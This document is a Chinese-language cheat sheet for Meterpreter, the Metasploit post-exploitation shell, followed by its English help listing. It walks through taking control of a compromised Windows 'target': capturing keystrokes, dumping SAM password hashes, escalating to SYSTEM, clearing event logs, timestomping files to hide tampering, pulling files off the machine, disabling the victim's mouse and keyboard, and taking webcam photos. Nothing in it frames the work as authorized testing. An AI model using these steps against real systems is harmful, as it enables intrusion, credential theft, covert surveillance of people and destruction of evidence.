Meterpreter命令

sessions -l  用于查看你控制的电脑
你会看到:

Id Description Tunnel 

4  meterpreter x86/win32  server-PC\Administrator @ SERVER-PC  192.168.195.140:4444 -> 192.168.195.1:52540 (192.168.195.1) 

注意前面的ID号
你要控制哪台就输入:
meterpreter >sessions -i  4
例如本次案例ID号为:4
meterpreter >sysinfo
显示目标系统信息
meterpreter > backround
退出目标系统,回到Metasploit主界面
meterpreter > ps
显示目标系统上的进程
meterpreter > keyscan_start
监控目标系统键盘输入,停止监控为keyscan_stop
meterpreter > keyscan_dump
输出截获到的目标键盘输入字符信息
meterpreter > migrate
将你的Meterpreter移到另一个进程
先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)
meterpreter > ipconfig
显示对方网络信息
meterpreter > getuid
获取用户的服务器运行
meterpreter > shell
进入目标电脑,命令提示符
meterpreter > Idletime
目标电脑闲置了多长时间
meterpreter > Hashdump
导出对方SAM数据库里的内容,推荐一个hash破解网站:
meterpreter > getsystem
利用已自漏洞,自动提权为SYSTEM
meterpreter > clearev
清除事件日志
meterpreter > execute (某Windows指令)
在对方电脑上运行该指令
meterpreter > execute 
Usage: execute -f file [options] 

Executes a command on the remote machine. 

OPTIONS: 

    -H        Create the process hidden from view. 
    -a <opt>  The arguments to pass to the command. 
    -c        Channelized I/O (required for interaction). 
    -d <opt>  The 'dummy' executable to launch when using -m. 
    -f <opt>  The executable command to run. 
    -h        Help menu. 
    -i        Interact with the process after creating it. 
    -k        Execute process on the meterpreters current desktop 
    -m        Execute from memory. 
    -s <opt>  Execute process in a given session as the session user 
    -t        Execute process with currently impersonated thread token 

meterpreter >timetomp
修改文件时间属性
meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34"   修改文件创建时间
meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34"  修改文件修改时间
 meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面
meterpreter > download (文件路径)
下载文件命令
例如下载C盘下面的jzking121.txt文件
meterpreter > download c:\\jzking121.txt
[*] downloading: c:\jzking121.txt -> jzking121.txt
[*] downloaded : c:\jzking121.txt -> jzking121.txt
注意,文件路径中要有两个\\
Upload指令跟Download指令类似!
meterpreter > shutdown 
关闭目标计算机,reboot为重启计算机
meterpreter >screenshot
获取目标电脑,屏幕截图
meterpreter > uictl enable keyboard 启用目标使用键盘
meterpreter > uictl disable mouse    禁止目标使用鼠标
enable 为启用
disable 禁用
meterpreter > webcam_list
目标系统的摄像头列表
meterpreter > webcam_snap
从指定的摄像头,拍摄照片
meterpreter > search -d c:\\ -f 1.jpg
搜索目标电脑,C盘1.jpg文件



meterpreter > help 

Core Commands 
============= 

    Command                   Description 
    -------                   ----------- 
    ?                         Help menu 
    background                Backgrounds the current session 
    bgkill                    Kills a background meterpreter script 
    bglist                    Lists running background scripts 
    bgrun                     Executes a meterpreter script as a background thread 
    channel                   Displays information about active channels 
    close                     Closes a channel 
    disable_unicode_encoding  Disables encoding of unicode strings 
    enable_unicode_encoding   Enables encoding of unicode strings 
    exit                      Terminate the meterpreter session 
    help                      Help menu 
    info                      Displays information about a Post module 
    interact                  Interacts with a channel 
    irb                       Drop into irb scripting mode 
    load                      Load one or more meterpreter extensions 
    migrate                   Migrate the server to another process 
    quit                      Terminate the meterpreter session 
    read                      Reads data from a channel 
    resource                  Run the commands stored in a file 
    run                       Executes a meterpreter script or Post module 
    use                       Deprecated alias for 'load' 
    write                     Writes data to a channel 


Stdapi: File system Commands 
============================ 

    Command       Description 
    -------       ----------- 
    cat           Read the contents of a file to the screen 
    cd            Change directory 
    download      Download a file or directory 
    edit          Edit a file 
    getlwd        Print local working directory 
    getwd         Print working directory 
    lcd           Change local working directory 
    lpwd          Print local working directory 
    ls            List files 
    mkdir         Make directory 
    pwd           Print working directory 
    rm            Delete the specified file 
    rmdir         Remove directory 
    search        Search for files 
    upload        Upload a file or directory 


Stdapi: Networking Commands 
=========================== 

    Command       Description 
    -------       ----------- 
    ifconfig      Display interfaces 
    ipconfig      Display interfaces 
    portfwd       Forward a local port to a remote service 
    route         View and modify the routing table 


Stdapi: System Commands 
======================= 

    Command       Description 
    -------       ----------- 
    clearev       Clear the event log 
    drop_token    Relinquishes any active impersonation token. 
    execute       Execute a command 
    getpid        Get the current process identifier 
    getprivs      Attempt to enable all privileges available to the current process 
    getuid        Get the user that the server is running as 
    kill          Terminate a process 
    ps            List running processes 
    reboot        Reboots the remote computer 
    reg           Modify and interact with the remote registry 
    rev2self      Calls RevertToSelf() on the remote machine 
    shell         Drop into a system command shell 
    shutdown      Shuts down the remote computer 
    steal_token   Attempts to steal an impersonation token from the target process 
    sysinfo       Gets information about the remote system, such as OS 


Stdapi: User interface Commands 
=============================== 

    Command        Description 
    -------        ----------- 
    enumdesktops   List all accessible desktops and window stations 
    getdesktop     Get the current meterpreter desktop 
    idletime       Returns the number of seconds the remote user has been idle 
    keyscan_dump   Dump the keystroke buffer 
    keyscan_start  Start capturing keystrokes 
    keyscan_stop   Stop capturing keystrokes 
    screenshot     Grab a screenshot of the interactive desktop 
    setdesktop     Change the meterpreters current desktop 
    uictl          Control some of the user interface components 


Stdapi: Webcam Commands 
======================= 

    Command       Description 
    -------       ----------- 
    webcam_list   List webcams 
    webcam_snap   Take a snapshot from the specified webcam 


Priv: Elevate Commands 
====================== 

    Command       Description 
    -------       ----------- 
    getsystem     Attempt to elevate your privilege to that of local system. 


Priv: Password database Commands 
================================ 

    Command       Description 
    -------       ----------- 
    hashdump      Dumps the contents of the SAM database 


Priv: Timestomp Commands 
======================== 

    Command       Description 
    -------       ----------- 
    timestomp     Manipulate file MACE attributes